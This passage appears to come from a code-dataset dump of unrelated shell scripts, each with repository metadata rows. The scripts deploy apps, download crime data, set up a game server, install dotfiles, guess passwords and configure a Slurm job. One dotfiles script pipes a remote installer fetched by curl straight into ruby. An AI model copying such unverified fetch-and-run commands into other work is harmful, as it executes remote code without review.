if [[ ! -z ${DEPLOY_ALL} && ! -z ${ENV_NAME} ]]; then
echo ""
echo "Starting deploy ALL for env [ ${ENV_NAME} ] <<--"
deploy_all
fi
if [[ ! -z ${STACK_NAME} && ! -z ${FILE_NAME} ]]; then
echo ""
echo "Starting deploy of [ ${FILE_NAME} ] for stack [ ${STACK_NAME} ] in [ ${REGION} ] "
echo ""
deploy_stack
fi
exit 0
| true
|
7608abe53ed5f1bcda63d77ec246387af05d9be4
|
Shell
|
kobeld/editorpro
|
/scripts/run_on_dev_for_editorpro.sh
|
UTF-8
| 730
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
# Update, rebuild, and restart editorpro on the dev box:
# pull gopandoc and editorpro, go-install the app, then replace the
# running instance.  Any failing update/build step aborts the deploy.
export GOPATH=/home/ubuntu/gopkg
export GOROOT=/usr/local/go
APPROOT="$GOPATH/src/github.com/kobeld/editorpro/"

echo "======= updating pandoc code ========"
cd "$GOPATH/src/github.com/kobeld/gopandoc" || exit 1
# `a && b || exit 1` aborts whether the checkout or the pull fails
# (replaces the original `if [[ $? != 0 ]]` checks).
git checkout master && git pull origin master || exit 1

echo "======= updating editorpro code ========"
cd "$APPROOT" || exit 1
git checkout master && git pull origin master || exit 1

echo "======= installing editorpro ======="
cd "$APPROOT" || exit 1
"$GOROOT/bin/go" install . || exit 1

echo "======= killing editorpro ======="
# Best effort: killall fails when no instance is running; that's fine.
sudo killall editorpro
echo $?

echo "======= restarting editorpro ======="
cd "$APPROOT" || exit 1
sudo nohup "$GOPATH/bin/editorpro" >> ~/editorpro.log 2>&1 &
| true
|
54c25fc9e4f8282e30a142eeed15452c08cfae2c
|
Shell
|
narayana-glassbeam/quarks
|
/scripts/connectors/iotf/runiotfsensors.sh
|
UTF-8
| 536
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Relative path from this script's directory to the quarks tree root.
quarks=../../..
# Runs IBM Watson IoT Plaform sample.
#
# runiotfsensors.sh path/device.cfg
#
# e.g. runiotfsensors.sh $HOME/device.cfg
#
# This connectors to your IBM Watson IoT Platform service
# as the device defined in the device.cfg.
# The format of device.cfg is the standard one for
# IBM Watson IoT Platform and a sample is in this directory
# (omitting values for the authorization tokens).
# $1 is the device.cfg path, forwarded verbatim to the sample's main.
export CLASSPATH=${quarks}/samples/lib/quarks.samples.connectors.jar
java quarks.samples.connectors.iotf.IotfSensors $1
| true
|
b4af1faaffd18ec7d92f91d8601e0db562dfb804
|
Shell
|
azrosen92/fbi-crime-data
|
/dl-all-2018
|
UTF-8
| 957
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
# Download the 2018 FBI crime-data archive for each state, load it into
# the Postgres database named by $DB_NAME, then delete the raw files.
# Requires: curl, psql, and the DB_NAME environment variable.
[ ! -d data/2018 ] && mkdir data/2018
# No download available for NC, NY, Alaska, California, Florida, Nevada,
# and Wyoming
# NOTE(review): "HA" is not a USPS state code (Hawaii is "HI") --
# confirm against the bucket's actual file names.
STATES=(AL AR AK CO CT DE DC GA HA ID IL IN IA KS KY LA ME MD MA MI MN MS MO MT
NE NH NM ND OH OK OR PA RI SC SD TN TX UT VT VA WA WV WI)
for state in "${STATES[@]}"; do
echo "Downloading data for ${state}"
curl \
-o 2018-${state}.zip \
http://s3-us-gov-west-1.amazonaws.com/cg-d4b776d0-d898-4153-90c8-8336f86bdfec/2018/${state}-2018.zip
echo "Unzipping retrieved data"
# NOTE(review): extracting a .zip with tar only works where tar is
# bsdtar (e.g. macOS); GNU tar cannot read zip archives -- confirm.
tar xvf 2018-${state}.zip -C data/2018/
echo "Removing zip file"
rm ./2018-${state}.zip
# Run the one-time table setup only when the target database exists.
if [[ $(psql -lqt | cut -d \| -f 1 | grep $DB_NAME) ]]; then
(cd data/2018/${state} && psql -d $DB_NAME -f ./postgres_setup.sql)
fi
echo "Copying data for ${state} into database"
(cd data/2018/${state}/ && psql -d $DB_NAME -f ./postgres_load.sql)
echo "Removing raw data for ${state}"
rm -rf data/2018/${state}
done
| true
|
888fca6006e3d54eab303a48274df845c3f5764f
|
Shell
|
elm-conf/cfp
|
/script/create-db.sh
|
UTF-8
| 316
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Bootstrap a local Postgres data directory and create the "cfp"
# database with a "postgraphile" superuser role for development.
initdb data
# start DB but clean it up when we're done
foreman start db &
DB=$!
# Stop the background DB on any exit path (success or failure).
finish() {
kill $DB
}
trap finish EXIT
# now create the database
# NOTE(review): a fixed 1s sleep is a race -- the server may not accept
# connections yet; a pg_isready retry loop would be more reliable.
sleep 1
createdb -e cfp
psql -d cfp -c "CREATE ROLE postgraphile LOGIN PASSWORD 'dev';"
psql -d cfp -c "ALTER USER postgraphile WITH SUPERUSER;"
| true
|
41d704e731684d58856b523d25b60645d40f80e5
|
Shell
|
mosconi/inf2980
|
/trab1/run3_all.sh
|
UTF-8
| 300
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh
# Run run3.py ten times over every n*.bz2 dataset, storing each run's
# output in ../results.  Runs that already produced a result file are
# skipped, so the script can be relaunched to resume after a crash.
# Abort if the datasets directory is missing instead of running in cwd.
cd datasets || exit 1
for i in n*.bz2; do
	# printf replaces the non-portable "echo -n" (this is /bin/sh,
	# where echo's -n handling is implementation-defined).
	printf '%s' "$i"
	for j in 0 1 2 3 4 5 6 7 8 9; do
		printf ' %s' "$j"
		# Skip run j when its result already exists (resume support).
		[ -f "../results/${i}.output_3_${j}" ] && continue
		python2.7 ../run3.py "${i}" > "${i}.output_3_${j}"
		mv "${i}.output_3_${j}" ../results/
	done
	echo " done"
done
| true
|
65bd07d7eaf397b75787cd34c8776fa9614743c9
|
Shell
|
imansaleh16/GroupingStackOverflowTags
|
/split_data.sh
|
UTF-8
| 1,594
| 3.40625
| 3
|
[
"MIT"
] |
permissive
|
# Splits data into train, dev, and test (60%, 20%, 20%). This split is not used per se because we ended up needing two splits, so we used train and dev and test combined.
# Example: input: data/Posts_Subset.xml_combined_mallet, output in data folder: MetaData_mallet_*, Posts_mallet_*, Tags_mallet_*, Titles_mallet_*
# Usage: split_data.sh <combined_mallet_file>
file=$1
# wc -l prints "<count> <name>"; routing it through a temp file and
# read captures both the line count and the (unchanged) file name.
wc -l $file > data/temp
read lines file < data/temp
echo "lines=$lines"
rm data/temp
# Ceiling division: train gets 60% of the lines, rounded up.
train=$((((lines*60)+99)/100))
# The remainder is halved between test and dev (test rounds up).
test=$((((lines-train)+1)/2))
dev=$((lines-(train+test)))
echo "train=$train, test=$test, dev=$dev"
# TextProcessor split presumably writes the first N lines to <file>_<N>
# and the remainder to <file>_ -- inferred from the mv targets below;
# TODO confirm against textutils.TextProcessor.
java -cp "libs/xmlparser/*:libs/stanford/*:bin" textutils.TextProcessor split $file $train
java -cp "libs/xmlparser/*:libs/stanford/*:bin" textutils.TextProcessor split "${file}_" $test
mv "${file}_${train}" "data/Posts_mallet_train"
mv "${file}__${test}" "data/Posts_mallet_test"
mv "${file}__" "data/Posts_mallet_dev"
rm "${file}_"
# The titles/tags/metadata variants (same name with "combined" swapped)
# are assumed to have been split already by the same TextProcessor run
# -- only the renames happen below.  TODO confirm.
o_file=$file
file=$(sed -e "s/combined/titles/g" <<< $o_file)
echo "${file}_${test}"
mv "${file}_${train}" "data/Titles_mallet_train"
mv "${file}__${test}" "data/Titles_mallet_test"
mv "${file}__" "data/Titles_mallet_dev"
rm "${file}_"
file=$o_file
file=$(sed -e "s/combined/tags/g" <<< $file)
echo "${file}_${train}"
mv "${file}_${train}" "data/Tags_mallet_train"
mv "${file}__${test}" "data/Tags_mallet_test"
mv "${file}__" "data/Tags_mallet_dev"
rm "${file}_"
file=$o_file
file=$(sed -e "s/combined/metadata/g" <<< $file)
echo "${file}_${train}"
mv "${file}_${train}" "data/MetaData_mallet_train"
mv "${file}__${test}" "data/MetaData_mallet_test"
mv "${file}__" "data/MetaData_mallet_dev"
rm "${file}_"
| true
|
fc02bdad97335b7d0a20b2b88766eed713eeff77
|
Shell
|
tarmiste/lfspkg
|
/archcore/svnsnap/community/colorgcc/repos/community-any/PKGBUILD
|
UTF-8
| 880
| 2.609375
| 3
|
[] |
no_license
|
# $Id: PKGBUILD 164529 2016-03-03 17:18:57Z jlichtblau $
# Maintainer: Eric Belanger <eric@archlinux.org>
# Maintainer: Jaroslav Lichtblau <svetlemodry@archlinux.org>
pkgname=colorgcc
pkgver=1.4.4
pkgrel=2
pkgdesc="A Perl wrapper to colorize the output of compilers with warning/error messages matching the gcc output format"
arch=('any')
url="http://www.schlueters.de/colorgcc.html"
license=('GPL')
depends=('perl')
makedepends=('git')
backup=('etc/colorgcc/colorgccrc')
# Source is pinned to the upstream git tag matching pkgver; sha1sums is
# SKIP because git sources are identified by the tag, not a checksum.
source=(git://github.com/olibre/colorgcc.git#tag=$pkgver)
sha1sums=('SKIP')
package() {
cd ${pkgname}
install -D -m755 colorgcc.pl "${pkgdir}/usr/bin/colorgcc"
install -D -m644 colorgccrc "${pkgdir}/etc/colorgcc/colorgccrc"
install -D -m644 README.md "${pkgdir}/usr/share/doc/colorgcc/README"
# Shadow cc/c++/gcc/g++ with colorgcc symlinks; users activate the
# wrapper by prepending /usr/lib/colorgcc/bin to PATH.
install -d "${pkgdir}/usr/lib/colorgcc/bin"
for i in cc c++ gcc g++ ; do
ln -s /usr/bin/colorgcc "${pkgdir}/usr/lib/colorgcc/bin/${i}"
done
}
| true
|
72bc289614ece0a5327dd4dcd762e14c2b8b9677
|
Shell
|
sasipalakizhi/keytool-certificate-chain-example
|
/src/07_importcert_intermediate.sh
|
UTF-8
| 399
| 2.9375
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
set -o nounset
set -o errexit
# Importing the Root CA's certificate into the Intermediate CA's key store.
# This makes the intermediate store trust the root so the full chain
# can later be assembled there.
# Required env vars (nounset makes missing ones fatal): JAVA_HOME,
# ROOT_ALIAS, ROOT_CERTIFICATE, INTERMEDIATE_KEYPASS,
# INTERMEDIATE_KEYSTORE, INTERMEDIATE_STOREPASS, INTERMEDIATE_STORETYPE.
# -noprompt: accept the cert without interactive confirmation;
# -rfc: PEM output; -v: verbose.
"$JAVA_HOME/bin/keytool" -importcert \
-alias "$ROOT_ALIAS" \
-file "$ROOT_CERTIFICATE" \
-keypass "$INTERMEDIATE_KEYPASS" \
-keystore "$INTERMEDIATE_KEYSTORE" \
-noprompt \
-rfc \
-storepass "$INTERMEDIATE_STOREPASS" \
-storetype "$INTERMEDIATE_STORETYPE" \
-v
| true
|
44394e6f7c662130f2b632adc4b3d70570d841a8
|
Shell
|
paw3142/overc-installer
|
/installers/simple-install-md0.sh
|
UTF-8
| 486
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Partition /dev/sda and /dev/sdb, assemble a RAID-0 /dev/md0, create
# the filesystems and swap, and mount everything under /z for an
# install.  DESTRUCTIVE: overwrites both disks' partition tables.
BASEDIR=$(dirname "$BASH_SOURCE")
# Both fdisk answer files are required.  The original only checked
# fdisk-a.txt and would have failed halfway through -- after already
# repartitioning sda -- when fdisk-b.txt was missing.
for f in fdisk-a.txt fdisk-b.txt; do
	if [ ! -f "$f" ]; then
		echo "ERROR. no fdisk setup files available"
		exit 1
	fi
done
# fdisk. create partition layouts
fdisk /dev/sda < ./fdisk-a.txt
fdisk /dev/sdb < ./fdisk-b.txt
# md: stripe sda3 + sdb2 into a RAID-0 array
mdadm --create /dev/md0 -n2 -l0 /dev/sda3 /dev/sdb2
mkfs.ext4 -v -E stride=128 /dev/md0
mkdir /z
mount -v /dev/md0 /z
mkfs.ext4 /dev/sda1
mkswap /dev/sda2
mkswap /dev/sdb1
# Mount the boot partition:
cd /z
mkdir boot
mount -v /dev/sda1 boot
| true
|
31a21435b70d3fedc5588b886afc6cb0920b4a4b
|
Shell
|
copasi/COPASI
|
/admin/yacc.sh
|
UTF-8
| 2,062
| 3.15625
| 3
|
[
"LicenseRef-scancode-proprietary-license",
"Artistic-2.0",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
#!/usr/bin/env bash
# Copyright (C) 2019 - 2021 by Pedro Mendes, Rector and Visitors of the
# University of Virginia, University of Heidelberg, and University
# of Connecticut School of Medicine.
# All rights reserved.
# Copyright (C) 2017 - 2018 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., University of Heidelberg, and University of
# of Connecticut School of Medicine.
# All rights reserved.
# Copyright (C) 2010 - 2016 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., University of Heidelberg, and The University
# of Manchester.
# All rights reserved.
# Copyright (C) 2008 - 2009 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., EML Research, gGmbH, University of Heidelberg,
# and The University of Manchester.
# All rights reserved.
# Wrapper around bison/yacc: generates <prefix>_yacc.cpp/.hpp from a grammar
# file and rewrites the output so it fits COPASI's naming conventions.
# Usage: yacc.sh <yacc-binary> [options...] <grammar-file>
YACC="$1"
PATH=$PATH:/bin:/usr/bin:/usr/local/bin
# The grammar file is the LAST argument; the loop simply keeps the final one.
for arg in $@; do
    SOURCE_FILE=$arg
done
# Work inside the grammar's directory so generated files land next to it.
cd "$(dirname "${SOURCE_FILE}")"
SOURCE_FILE="$(basename "${SOURCE_FILE}")"
# Strip the extension to get the prefix used for -b/-p and the output names.
FILE_PREFIX="${SOURCE_FILE/%.*/}"
TARGET_FILE_C=${SOURCE_FILE/%.*/_yacc.cpp}
TARGET_FILE_H=${SOURCE_FILE/%.*/_yacc.hpp}
echo compiling $SOURCE_FILE '==>' $TARGET_FILE_C, $TARGET_FILE_H
echo ${YACC} -dt -b $FILE_PREFIX -p $FILE_PREFIX $SOURCE_FILE
${YACC} -dt -b $FILE_PREFIX -p $FILE_PREFIX $SOURCE_FILE
# We make sure that the file have the expected endings.
[ -e $FILE_PREFIX.tab.cpp ] && mv $FILE_PREFIX.tab.cpp ${TARGET_FILE_C}
[ -e $FILE_PREFIX.tab.hpp ] && mv $FILE_PREFIX.tab.hpp ${TARGET_FILE_H}
# Post-process the generated parser:
#  - rename the prefixed parse entry point back to yyparse
#  - drop the yylex #define and the yyparse prototype (declared elsewhere)
#  - fix the self-references to the renamed .cpp/.hpp files
#  - initialize yydebug from YYDEBUG and drop the getenv() probe
sed -e 's/'$FILE_PREFIX'parse/yyparse/g' \
    -e '/#define yylex/d' \
    -e '/int yyparse (.*);/d' \
    -e 's/'$FILE_PREFIX'.tab.cpp/'$TARGET_FILE_C'/g' \
    -e 's/'$FILE_PREFIX'.tab.hpp/'$TARGET_FILE_H'/g' \
    -e 's/int yydebug;/int yydebug = YYDEBUG;/' \
    -e '/getenv()/d' \
    ${TARGET_FILE_C} > $$.tmp && \
mv $$.tmp ${TARGET_FILE_C}
# On Cygwin the build expects CRLF line endings.
if [ x`uname -a | grep -ic cygwin` = x"1" ]; then
  unix2dos ${TARGET_FILE_C}
  unix2dos ${TARGET_FILE_H}
fi
| true
|
c94e6e7bdbb81c53ecf69599650cad665829d994
|
Shell
|
zack6849/dotfiles
|
/Code/Scripts/take-screenshot
|
UTF-8
| 174
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
# Grab an interactive region screenshot under a random 13-character name and
# hand it to the upload hook via scrot's -e exec option.
RANDFILENAME=$(pwgen -s 13 1)
FILENAME="$HOME/Uploader/Screenshots/$RANDFILENAME.png"
# BUGFIX: quote the path — a $HOME containing spaces previously word-split the
# scrot arguments.  The -e string is run through a shell by scrot, so the path
# is additionally single-quoted there.
scrot -s "$FILENAME" -e "screenshot-complete.sh '$RANDFILENAME.png' '$FILENAME'"
| true
|
123435a8b4bf16a9afa801f91f765049ea23ef04
|
Shell
|
robbiekenny/EAA
|
/week4B
|
UTF-8
| 226
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
# Back up the week4 directory when $1 is "true", otherwise restore it.
# BUGFIX: "$1" is quoted (with an empty default) — the unquoted test
# previously failed with "unary operator expected" when run without args.
if [ "${1:-}" = true ]; then
	if ! [ -d "$HOME/EAA/backups" ]; then
		mkdir "$HOME/EAA/backups"
	fi
	tar czf week4backup.tar.gz "$HOME/EAA/week4"
	mv week4backup.tar.gz "$HOME/EAA/backups"
else
	# Restore mode: unpack the archive from the current directory.
	tar -xzvf week4backup.tar.gz
fi
| true
|
05d73da8f622a43e14d655252e5d2c1052724431
|
Shell
|
lihongjie224/dst-admin
|
/src/main/resources/shell/other.sh
|
UTF-8
| 4,178
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
project="dst-admin" # 项目名称
sys=$(uname -s) # 操作系统
machine=$(uname -m) # 架构版本
darwin_steamcmd_link="https://steamcdn-a.akamaihd.net/client/installer/steamcmd_osx.tar.gz"
linux_steamcmd_link="https://steamcdn-a.akamaihd.net/client/installer/steamcmd_linux.tar.gz"
# Create the Linux dedicated-server environment (shared by the distro setups).
create() {
  echo "正在安装steamcmd..."
  res=$(./steamcmd.sh +login anonymous +force_install_dir ~/dst +app_update 343050 validate +quit)
  # BUGFIX: the old 'res=$res | grep "0x202"' ran the assignment inside a
  # pipeline subshell, so the parent's $res was never the grep result and the
  # disk-full check could not trigger.  Test the steamcmd output directly.
  if printf '%s\n' "$res" | grep -q "0x202"; then
    echo "${project} - 0x202错误 请检查可用空间是否 > 24GB"
    echo "${project} - 删除可能的 ~/steamcmd ~/Steam ~/dst 目录后重试 ./install.sh"
    rm -rf ~/Steam
    rm -rf ~/dst
    rm -rf ~/steamcmd
    exit 1;
  fi
  # 32-bit libstdc++ shipped with steamcmd is required by the DST binary.
  cp ~/steamcmd/linux32/libstdc++.so.6 ~/dst/bin/lib32/
  cd ~/dst/bin
  # Launcher scripts for the overworld (Master) and cave shards.
  echo ./dontstarve_dedicated_server_nullrenderer -console -cluster MyDediServer -shard Master > overworld.sh
  echo ./dontstarve_dedicated_server_nullrenderer -console -cluster MyDediServer -shard Caves > cave.sh
  chmod +x overworld.sh
  chmod +x cave.sh
  mkdir -p ~/.klei/DoNotStarveTogether/MyDediServer
  cd ~
  echo -e "${project} - 初始化完成\n${project} - 执行dstStart.sh脚本按照指示进行\n${project} - ./dstStart.sh"
  exit 1
}
# 配置环境
main() {
# mac
if [ "$sys" == "Darwin" ]; then
echo "${project} - 操作系统:MacOS"
mkdir ~/steamcmd && cd ~/steamcmd
wget ${darwin_steamcmd_link}
tar -zxvf steamcmd_osx.tar.gz
./steamcmd.sh +login anonymous +force_install_dir ~/dst +app_update 343050 validate +quit
cd ~/dst
mkdir ~/dst/bin
echo ~/dst/dontstarve_dedicated_server_nullrenderer.app/Contents/MacOS/dontstarve_dedicated_server_nullrenderer -console -cluster MyDediServer -shard Master > ~/dst/bin/overworld.sh
echo ~/dst/dontstarve_dedicated_server_nullrenderer.app/Contents/MacOS/dontstarve_dedicated_server_nullrenderer -console -cluster MyDediServer -shard Caves > ~/dst/bin/cave.sh
chmod +x ~/dst/bin/overworld.sh
chmod +x ~/dst/bin/cave.sh
mkdir -p ~/.klei/DoNotStarveTogether/MyDediServer
cd ~
echo -e "${project} - 初始化完成\n${project} - 执行dstStart.sh脚本按照指示进行\n${project} - ./dstStart.sh"
exit 1
fi
# linux
if [ "$sys" == "Linux" ]; then
distribution=$(lsb_release -i | awk '{print $3}') # 发行版本
echo "${project} - 操作系统:Linux"
echo "${project} - ${distribution} ${machine}"
if [ "$machine" == "x86_64" ]; then
case $distribution in
CentOS)
echo "${project} - 安装CentOS依赖环境"
mkdir ~/steamcmd && cd ~/steamcmd
wget ${linux_steamcmd_link}
tar -xvzf steamcmd_linux.tar.gz
sudo yum install -y glibc.i686 libstdc++.i686 ncurses-libs.i686 screen libcurl.i686
sudo yum install -y SDL2.x86_64 SDL2_gfx-devel.x86_64 SDL2_image-devel.x86_64 SDL2_ttf-devel.x86_64
# CentOS需要建立libcurl-gnutls.so.4软连接
ln -s /usr/lib/libcurl.so.4 /usr/lib/libcurl-gnutls.so.4
create
;;
Ubuntu)
echo "${project} - 安装Ubuntu依赖环境"
mkdir ~/steamcmd && cd ~/steamcmd
wget ${linux_steamcmd_link}
tar -xvzf steamcmd_linux.tar.gz
sudo apt-get update
sudo apt-get install -y lib32gcc1 libcurl4-gnutls-dev:i386 libsdl2-2.0 libsdl2-dev screen
sudo apt-get install -y libsdl-image1.2-dev libsdl-mixer1.2-dev libsdl-ttf2.0-dev libsdl-gfx1.2-dev
create
;;
*)
echo "${project} - 暂不支持该Linux发行版 ${distribution}"
;;
esac
else
echo "${project} - 不受支持的架构版本 ${machine}"
fi
fi
}
main
| true
|
bc43e88e357dc64194bcf9b044ba9d80c69ce38b
|
Shell
|
iToto/dotfiles
|
/install.sh
|
UTF-8
| 4,485
| 4.21875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Settings
cwd=$(pwd)
# functions for text formatting
# Status-line helpers: info (pending), user (question), success (OK),
# fail (error + abort).  Format strings are unchanged from the original.
info () {
  local msg=$1
  printf "  [ \033[00;34m..\033[0m ] ${msg}"
}

user () {
  local question=$1
  printf "\r  [ \033[0;33m?\033[0m ] ${question} "
}

success () {
  local msg=$1
  printf "\r\033[2K  [ \033[00;32mOK\033[0m ] ${msg}\n"
}

fail () {
  local msg=$1
  printf "\r\033[2K  [\033[0;31mFAIL\033[0m] ${msg}\n"
  echo ''
  exit
}
prompt_warning () {
# warn user about overwriting files
info "WARNING: This script will replace all current dotfile settings. \n"
info "Would you like to continue? [Y/n]: "
read cont
printf "\n"
if [ "$cont" = "n" ]; then
echo "Exited."
exit
fi
}
# Install methods
pkgmgmt=true
packagemanager_setup () {
  # Ask which OS we are on and derive the package-manager command.
  # Sets the globals: os, pkgmgmt.
  # BUGFIX: the old loop condition was 'while $pkgmgmt' — once a selection was
  # made, the condition EXECUTED the chosen package manager (e.g. "pacman -S")
  # just to decide whether to loop.  A dedicated flag drives the loop now.
  local os_chosen=false
  while [ "$os_chosen" = false ]; do
    # check which os we're running
    info "Operating System [ a:arch, d:debian, r:redhat, o:osx ]: "
    read os
    printf "\n"

    # pick which package manager to use based on os
    case "$os" in
      "a")
        pkgmgmt="pacman -S"; os_chosen=true
        ;;
      "d")
        pkgmgmt="apt-get install"; os_chosen=true
        ;;
      "r")
        pkgmgmt="yum install"; os_chosen=true
        ;;
      "o")
        pkgmgmt="brew install"; os_chosen=true
        ;;
      *)
        echo "Please select a valid Operating System."
        ;;
    esac
  done

  # prepend sudo if not osx
  [ "$os" != "o" ] && pkgmgmt="sudo $pkgmgmt"

  # If osx, check if Homebrew is installed
  if [ "$os" = "o" ]; then
    which -s brew
    if [[ $? != 0 ]] ; then
      # Install Homebrew
      info "Installing Homebrew"
      ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
    fi
  fi
}
programs_install () {
info 'Installing Programs \n'
# Update packages
info "Updating Packages"
$pkgmgmt update
# if osx, install things a little differently
if [ "$os" = "o" ]; then
source $cwd/osx/install.sh
else
$pkgmgmt python-pip vim vim-nox
fi
# install tmux and curl
$pkgmgmt tmux curl
}
packages_install () {
  # Python tooling used by the rest of the dotfiles.
  local pkg
  for pkg in virtualenv virtualenvwrapper httpie; do
    sudo pip install "$pkg"
  done
}
# gitconfig
git_install () {
info 'setup gitconfig'
user ' - What is your github author name?'
read -e git_authorname
user ' - What is your github author email?'
read -e git_authoremail
sed -e "s/AUTHORNAME/$git_authorname/g" -e "s/AUTHOREMAIL/$git_authoremail/g" $cwd/git/gitconfig > $HOME/.gitconfig
success 'gitconfig'
}
git_update () {
  # Copy the tracked git dotfiles into the home directory.
  info 'setup git'
  local f
  for f in gitignore gitconfig; do
    cp "$cwd/git/$f" "$HOME/.$f"
  done
  success 'setup git'
}
# generic shell
# generic shell
shell_update () {
  # Install the shared alias/function/path snippets as dotfiles.
  info 'installing shell aliases, functions, and paths'
  local name
  for name in aliases functions paths; do
    cp "$cwd/shell/${name}.sh" "$HOME/.${name}"
  done
  success 'installed shell aliases, functions, and paths'
}
# zsh
shell_zsh_install () {
# Install Zsh
info "Installing Zsh \n"
$pkgmgmt zsh
info "Setting zsh as default shell \n"
chsh -s /bin/zsh
}
shell_zsh_update () {
info 'setting up zsh'
cp $cwd/shell/zsh/zshrc $HOME/.zshrc
cp -r $cwd/shell/zsh $HOME/.zsh
success 'set up zsh'
}
# bash
shell_bash_update () {
info 'setting up bash'
cp $cwd/shell/bash/bashrc ~/.bashrc
cp -r $cwd/shell/bash ~/.bash
success 'set up bash'
}
# tmux
tmux_update () {
  # Drop the tmux configuration into place.
  info 'Installing tmux settings.'
  cp "$cwd/tmux/tmux.conf" "$HOME/.tmux.conf"
  success 'Installing tmux settings.'
}
# vim
vim_update () {
if [ ! -d "$HOME/.vim" ]; then
cp -r $cwd/vim $HOME/.vim
fi
cp $cwd/vim/vimrc $HOME/.vimrc
cp $cwd/vim/bundles.vim $HOME/.vim/bundles.vim
if [ -d "$HOME/.vim/plugin-configs" ]; then
rm -rf $HOME/.vim/plugin-configs
fi
cp -r $cwd/vim/plugin-configs $HOME/.vim
if [ ! -d "$HOME/.vim/bundle/vundle" ]; then
git clone https://github.com/gmarik/vundle.git $HOME/.vim/bundle/vundle
fi
vim +BundleInstall +qall
}
vim_install () {
info 'setup vim'
cp -r $cwd/vim ~/.vim
vim_update
success 'vim setup'
}
# misc
misc_update () {
  # Silver-searcher ignore list.
  cp "$cwd/ag/agignore" "$HOME/.agignore"
}

misc_install() {
  # Fresh install is identical to an update for these files.
  misc_update
}
# do it!
# "install.sh update" refreshes the copied dotfiles only; anything else runs
# the full interactive installation.
if [ "${1:-}" = "update" ]; then
  git_update
  shell_update
  shell_zsh_update
  vim_update
  tmux_update
  misc_update
  # todo: add update methods everything else
else
  # let's do this!
  prompt_warning
  packagemanager_setup
  programs_install
  packages_install
  git_install
  git_update
  shell_update
  shell_zsh_install
  shell_zsh_update
  # BUGFIX: the script used to call shell_bash_install, which is not defined
  # anywhere in this file; the bash setup lives in shell_bash_update.
  shell_bash_update
  tmux_update
  vim_install
  misc_install
fi

success "All done!"
| true
|
a63ca8988401b35c68ed3bf453e89161d8e1968f
|
Shell
|
cha63506/zyre-git
|
/PKGBUILD
|
UTF-8
| 1,127
| 3.0625
| 3
|
[] |
no_license
|
# Contributor: Patrick Hanckmann <hanckmann at gmail.com>
# Maintainer: Patrick Hanckmann <hanckmann at gmail.com>
pkgname=zyre-git
pkgver=1.0.0
pkgrel=2
pkgdesc="Zyre - an open-source framework for proximity-based peer-to-peer applications (ZeroMQ)"
arch=(i686 x86_64)
url="https://github.com/zeromq/zyre"
license=('LGPL')
depends=('czmq-git')
makedepends=('git')
provides=(zyre)
conflicts=(zyre)
options=(!libtool)
_gitroot="git://github.com/zeromq/zyre.git"
_gitname="zyre"
build() {
  cd "$srcdir"
  msg "Connecting to GIT server...."
  # NOTE(review): the rm -rf below removes the checkout unconditionally, so
  # the 'git pull' branch of the following if is effectively dead code and a
  # fresh clone always happens — confirm whether the rm was intended.
  rm -rf "$srcdir/$_gitname"
  if [ -d $_gitname ] ; then
    cd $_gitname && git pull origin
    msg "The local files are updated."
  else
    git clone $_gitroot $_gitname
  fi
  # switch to tag v1.0.0
  cd "$srcdir/$_gitname"
  git checkout v1.0.0
  msg "GIT checkout done or server timeout"
  msg "Starting make..."
  # Build from a disposable local clone so $srcdir/$_gitname stays pristine.
  rm -rf "$srcdir/$_gitname-build"
  git clone "$srcdir/$_gitname" "$srcdir/$_gitname-build"
  cd "$srcdir/$_gitname-build"
  #
  # BUILD HERE
  #
  ./autogen.sh
  ./configure --prefix=/usr
  make
}
package() {
  cd "$srcdir/$_gitname-build"
  make DESTDIR="$pkgdir/" install
}
| true
|
fb6efe6f96eaa353c648f6ea1b1ad0108f2292a1
|
Shell
|
hsvarma2092/COMP2101
|
/bash/passwordguesser.sh
|
UTF-8
| 788
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
# This script demonstrates testing to see if 2 strings are the same
# TASK 1: Improve it by asking the user for a password guess instead of using inline literal data
# TASK 2: Improve it by rewriting it to use the if command
# TASK 3: Improve it by giving them 3 tries to get it right before failing (test 3 times but only if necessary)
# *** Do not use the exit command
referenceString="Scripting"
guessed=false
attempt=0
# BUGFIX: the old elif chain tested the SAME variable three times without
# re-prompting, so the extra tries never happened.  Loop up to three times,
# stopping early on a correct guess (no 'exit' used, per the task).
while [ "$attempt" -lt 3 ] && [ "$guessed" = false ]; do
    read -s -p "enter password: " mypassword
    echo
    if [ "$mypassword" = "$referenceString" ]; then
        guessed=true
    fi
    attempt=$((attempt + 1))
done
if [ "$guessed" = true ]; then
    echo "Bingo !! you entered right password"
else
    echo "fewww.. try again"
fi
| true
|
9de523f04bb2c7412fc5f60c5bca18cb4d066d65
|
Shell
|
wandrewjam/thesis
|
/reg_stokeslets/src/scripts/runner07.slurm
|
UTF-8
| 915
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
#SBATCH --time=16:00:00
#SBATCH --nodes=1
#SBATCH --ntasks=20
#SBATCH --account=fogelson
#SBATCH --partition=kingspeak
#SBATCH -C "c20"
#SBATCH -o runner07.out
#SBATCH -e runner07.err
# find number of threads for OpenMP (adapted from CHPC code)
# find number of MPI tasks per node
# Slurm reports values like "20(x2)"; 'cut -f 1 -d \(' keeps the leading count.
export TPN=$(echo $SLURM_TASKS_PER_NODE | cut -f 1 -d \()
# find number of CPU cores per node
export PPN=$(echo $SLURM_JOB_CPUS_PER_NODE | cut -f 1 -d \()
(( THREADS = PPN / TPN ))
# export OMP_NUM_THREADS=$THREADS
# OpenMP is pinned to one thread here; parallelism comes from GNU parallel below.
export OMP_NUM_THREADS=1
echo "$TPN"
echo "$PPN"
echo "$OMP_NUM_THREADS"
